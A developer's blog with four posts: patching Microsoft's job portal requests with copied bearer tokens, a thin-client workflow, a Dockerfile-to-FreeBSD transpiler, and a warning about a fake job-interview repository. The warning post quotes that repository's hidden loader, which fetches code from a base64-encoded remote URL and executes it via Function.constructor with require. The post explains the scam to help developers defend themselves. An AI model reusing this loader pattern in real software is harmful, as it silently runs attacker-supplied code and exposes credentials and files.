Monday, October 27, 2025

Debugging Microsoft's Job Portal

Or: When applying for a job becomes a technical interview you didn't sign up for

TL;DR: Microsoft's job portal had a bug that prevented me from submitting my application. After some browser console detective work, I discovered missing bearer tokens, set strategic JavaScript breakpoints, and manually injected authentication headers to get my resume through. The irony of debugging Microsoft's code to apply to Microsoft was not lost on me.

I was excited to apply for a position at Microsoft. Their job portal has a nice feature: you can import your resume directly from LinkedIn rather than uploading a PDF. Convenient, right? I clicked the import button, watched my information populate, and confidently hit "Upload."

And waited. And waited.

Nothing happened. The button was stuck in a loading state, spinning endlessly.

As any developer would do when faced with a broken web app, I opened the browser's Network tab. There it was: a failing request to gcsservices.careers.microsoft.com. I examined the request headers and immediately spotted the problem: Authorization: Bearer undefined.

Ah yes, the classic "undefined" bearer token. Someone's authentication flow was broken. The frontend was trying to make an authenticated request, but the token wasn't being set properly.

I started looking through other requests in the Network tab and found several that did have valid bearer tokens. I copied one of these working tokens for later use. Now I needed to figure out where in the code this broken request was being made.

I searched through the loaded JavaScript files and found the culprit in a minified file called main.0805accee680294efbb3.js. The code looked like this:

e && e.headers && (
    e.headers.Authorization = "Bearer " + await (0, r.gf)(),
    e.headers["X-CorrelationId"] = i.$.telemetry.sessionId,
    e.headers["X-SubCorrelationId"] = (0, s.A)(),
    t(e)
)

This is where the bearer token was supposed to be added to the request headers. The r.gf function was clearly supposed to retrieve the token, but it was returning undefined.

I set a breakpoint on this line using Chrome DevTools. When the breakpoint hit, I manually set the bearer token in the console:

e.headers.Authorization = "Bearer " + "[my-valid-token]"

Then I let the execution continue. Success! The resume uploaded. Victory, right? Not quite.

After uploading the resume, I tried to click "Save and continue" to move to the next step. More failed requests.

Back to the Network tab. This time, I noticed requests failing to a different domain: careers.microsoft.com (without the "gcsservices" subdomain). These requests also had bearer token issues, but here's the twist: they needed a different bearer token than the first set of requests. Microsoft's job portal was apparently using two separate authentication systems.

I searched through the JavaScript again and found where XMLHttpRequest headers were being set:

const o = Ee.from(r.headers).normalize();

This was in a different part of the codebase handling a different set of API calls. I set another breakpoint here. Now I had a two-token juggling act: when requests went to gcsservices.careers.microsoft.com, I set Token A, and when requests went to careers.microsoft.com, I set Token B.

With both breakpoints set and both tokens ready, I went through the application flow one more time, pausing at each breakpoint to add the appropriate token: Token A for gcsservices requests, Token B for careers.microsoft.com requests. It finally worked. I made it through to the next page.
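
In hindsight, instead of pausing at a breakpoint for every request, I could have patched the page's networking APIs from the console to inject the right token per host. Here's a rough sketch of that idea; the token values are placeholders for the ones copied from working requests, and it assumes the page issues its calls through fetch and XMLHttpRequest:

// Rough console sketch: auto-inject the right bearer token per host.
// TOKEN_A and TOKEN_B are placeholders for tokens copied from working requests.
const TOKEN_A = "token-for-gcsservices.careers.microsoft.com";
const TOKEN_B = "token-for-careers.microsoft.com";

const tokenFor = (url) => {
    const host = new URL(url, location.href).host;
    if (host === "gcsservices.careers.microsoft.com") return TOKEN_A;
    if (host === "careers.microsoft.com") return TOKEN_B;
    return null;
};

// Wrap fetch so matching requests get an Authorization header.
const originalFetch = window.fetch.bind(window);
window.fetch = (input, init = {}) => {
    const url = typeof input === "string" ? input : input.url;
    const token = tokenFor(url);
    if (token) {
        init.headers = new Headers(init.headers || {});
        init.headers.set("Authorization", "Bearer " + token);
    }
    return originalFetch(input, init);
};

// Wrap XMLHttpRequest the same way, remembering the URL from open().
const originalOpen = XMLHttpRequest.prototype.open;
const originalSend = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.open = function (method, url, ...rest) {
    this._interceptedUrl = url;
    return originalOpen.call(this, method, url, ...rest);
};
XMLHttpRequest.prototype.send = function (body) {
    const token = tokenFor(this._interceptedUrl);
    if (token) this.setRequestHeader("Authorization", "Bearer " + token);
    return originalSend.call(this, body);
};

In practice the two breakpoints were enough, but a patch along these lines would have saved a lot of clicking.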


There's something deliciously ironic about having to debug Microsoft's production code just to submit a job application to Microsoft. Oh, and did I mention? I was doing all of this on a Chromebook Flex. 😄

This reminded me of last year when I wanted to buy a book from an online store. Their checkout form was broken and wouldn't let me proceed to payment. So I opened the browser console, found the validation bug in their JavaScript, bypassed it, and successfully placed my order. Apparently, fixing broken web forms has become my unexpected superpower.

To the Microsoft Hiring Team

If you're reading this:

  • Can I haz job?

Did I need to spend an hour debugging a job application portal? No. Was it more interesting than just uploading a PDF? Absolutely. And hey, if nothing else, I got a good blog post out of it.

Have you ever had to debug something just to accomplish a simple task? Share your stories in the comments!

Friday, October 17, 2025

Almost exploited via a job interview assignment

A few days ago, someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted to move me forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine, though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (it is, after all, something crypto-related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

const errorHandler = (error) => {
    const createHandler = (errCode) => {
        const handler = new (Function.constructor)('require', errCode);
        return handler;
    };
    const handlerFunc = createHandler(error);
    handlerFunc(require);
}

axios.get(atob(COOKIE_URL)).then(
    res => errorHandler(res.data.cookie)
);

Had I started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. Environment variables, API keys, credentials, sensitive files, backdoors: all of it would have been in play.
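
To make the mechanism concrete, here's a harmless, hypothetical stand-in for what the server could have returned. Any string handed to the Function constructor becomes a real function, and passing require into it hands over the whole Node.js runtime:

// Harmless stand-in for the string an attacker's server might return.
const payload = "const os = require('os'); console.log('arbitrary code, running as', os.userInfo().username);";

// Same technique as the "error handler" above: the string becomes a function body.
const handler = new (Function.constructor)('require', payload);
handler(require); // executes attacker-chosen code with full access to require()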

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with a malicious payload hidden in the middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.
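
For instance, a throwaway container with the repository mounted read-only and networking disabled is a cheap way to poke at unfamiliar code without giving it anything to steal (a sketch; the node:20 image and paths are just examples):

docker run --rm -it --network none -v "$PWD":/src:ro -w /src node:20 bash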

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.
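
The setup itself is minimal. In my experience, a host entry in ~/.ssh/config is all the Remote-SSH side of VS Code needs to offer the machine as a target (the name and address below are placeholders):

Host devbox
    HostName 192.168.1.50
    User me
    IdentityFile ~/.ssh/id_ed25519

From there, ssh devbox works in the terminal, and the same alias shows up as a remote host in VS Code.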

This philosophy is portable. I have a Chromebook that I leave at my in-laws', perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VSCode. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VSCode experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VSCode window was connected to a powerful machine running the develop branch, and a second VSCode window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The experience has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand that apt-get invocation deeply enough to transform it to:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.
